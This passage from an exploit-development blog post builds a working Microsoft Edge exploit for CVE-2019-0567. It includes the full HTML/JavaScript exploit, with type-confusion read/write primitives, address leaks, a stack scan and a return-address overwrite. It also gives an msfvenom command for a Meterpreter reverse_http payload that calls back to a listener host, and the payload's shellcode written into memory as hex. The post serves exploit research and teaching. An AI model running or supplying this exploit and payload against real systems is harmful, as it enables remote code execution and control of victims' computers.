This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory and execute it within a process not protected by ACG. This makes sense, as this stipulation “protects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). However, we mentioned the stipulation is only that we cannot directly embed our shellcode as RWX memory and directly execute it via a process injection call stack like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). However, there is a way we can bypass this stipulation.

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack control-flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a “traditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the “final” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chains
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate my aforementioned exploitation path off of the ground work laid here. As this blog post continues on, I will explain some of the things I thought would work at first and how the above exploitation path actually came to be. Although the syllabus I read was succinct and concise, I learned as I developing my exploit some additional things Control Flow Guard checks which led to many more ROP chains than I would have liked. As this blog post goes on, I will explain my thought process as to what I thought would work and what actually worked.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.

Shellcode

The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Using the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a “no child processes” mitigation. Since a reverse shell requires spawning an instance of cmd.exe from the code calling it (our exploit), we can’t just use a normal reverse shell. Another way we could load code into the process space is through a DLL. However, remember that even though ACG is disabled in the JIT process, the JIT process still has Code Integrity Guard (CIG) enabled - meaning we can’t just use our payload to download a DLL to disk and then load it with LoadLibraryA. However, let’s take a further look at CIG’s documentation. Specifically regarding the Mitigation Bypass and Bounty for Defense Terms. If we scroll down to the “Code integrity mitigations”, we can take a look at what Microsoft deems to be out-of-scope.

If the image above is hard to view, open it in a new tab. As we can see Microsoft says that “in-memory injection” is out-of-scope of bypassing CIG. This means Microsoft knows this is an issue that CIG doesn’t address. There is a well-known technique known as reflective DLL injection where an adversary can use pure shellcode (a very large blob of shellcode) in order to load an entire DLL (which is unsigned by Microsoft) in memory, without ever touching disk. Red teamers have beat this concept to death, so I am not going to go in-depth here. Just know that we need to use reflective DLL because we need a payload which doesn’t spawn other processes.

Most command-and-control frameworks, like the one we will use (Meterpreter), use reflective DLL for their post-exploitation capabilities. There are two ways to approach this - staged and stageless. Stageless payloads will be a huge blob of shellcode that not only contain the DLL itself, but a routine that injects that DLL into memory. The other alternative is a staged payload - which will use a small first-stage shellcode which calls out to a command-and-control server to fetch the DLL itself to be injected. For our purposes, we will be using a staged reflective DLL for our shellcode.

To be more simple - we will be using the windows/meterpreter/x64/reverse_http payload from Metasploit. Essentially you can opt for any shellcode to be injected which doesn’t fork a new process.

The shellcode can be generated as follows: msfvenom -p windows/x64/meterpreter/reverse_http LHOST=YOUR_SERVER_IP LPORT=443 -f c

What I am about to explain next is (arguably) the most arduous part of this exploit. We know that in our exploit JavaScript limits us to 32-bit boundaries when reading and writing. So, this means we have to write our shellcode 4 bytes at a time. So, in order to do this, we need to divide up our exploit into 4-byte “segments”. I did this manually, but later figured out how to slightly automate getting the shellcode correct.

To “automate” this, we first need to get our shellcode into one contiguous line. Save the shellcode from the msfvenom output in a file named shellcode.txt.

Once the shellcode is in shellcode.txt, we can use the following one liner:

awk '{printf "%s""",$0}' shellcode.txt | sed 's/"//g' | sed 's/;//g' | sed 's/$/0000/' |  sed -re 's/\\x//g1' | fold -w 2 | tac | tr -d "\n" | sed 's/.\{8\}/& /g' | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }' | awk '{ for(i=1; i<=NF; i+=2) print $i, $(i+1) }' | sed 's/ /, /g' | sed 's/[^ ]* */0x&/g' | sed 's/^/write64(chakraLo+0x74b000+countMe, chakraHigh, /' | sed 's/$/);/' | sed 's/$/\ninc();/'

This will take our shellcode and divide it into four byte segments, remove the \x characters, get them in little endian format, and put them in a format where they will more easily be ready to be placed into our exploit.

Your output should look something like this:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, );
inc();

Notice at the last line, we are missing 4 bytes. We can add some NULL padding (NULL bytes don’t affect us because we aren’t dealing with C-style strings). We need to update our last line as follows:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
inc();

Let’s take just one second to breakdown why the shellcode is formatted this way. We can see that our write primitive starts writing this shellcode to chakra_base + 0x74b000. If we take a look at this address within WinDbg we can see it is “empty”.

This address comes from the .data section of chakra.dll - meaning it is RW memory that we can write our shellcode to. As we have seen time and time again, the !dh chakra command can be used to see where the different headers are located at. Here is how our exploit looks now:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// alert() for debugging
	alert("DEBUG");

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

As we can clearly, see, we use our write primitive to write 1 QWORD at a time our shellcode (this is why we have countMe+=0x8;. Let’s run our exploit, the same way we have been doing. When we run this exploit, an alert dialogue should occur just before the stack address is overwritten. When the alert dialogue occurs, we can debug the content process (we have already seen how to find this process via Process Hacker, so I won’t continually repeat this).

After our exploit has ran, we can then examine where our shellcode should have been written to: chakra_base + 0x74b000.

If we cross reference the disassembly here with the Metasploit Framework we can see that Metasploit staged-payloads will use the following stub to start execution.

As we can see, our injected shellcode and the Meterpreter shellcode both start with cld instruction to flush any flags and a stack alignment routine which ensure the stack is 10-byte aligned (Windows __fastcall requires this). We can now safely assume our shellcode was written properly to the .data section of chakra.dll within the content process.

Now that we have our payload, which we will execute at the end of our exploit, we can begin the exploitation process by starting with our “final” ROP chain.

VirtualProtect ROP Chain

Let me caveat this section by saying this ROP chain we are about to develop will not be executed until the end of our exploit. However, it will be a moving part of our exploit going forward so we will go ahead and “knock it out now”.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

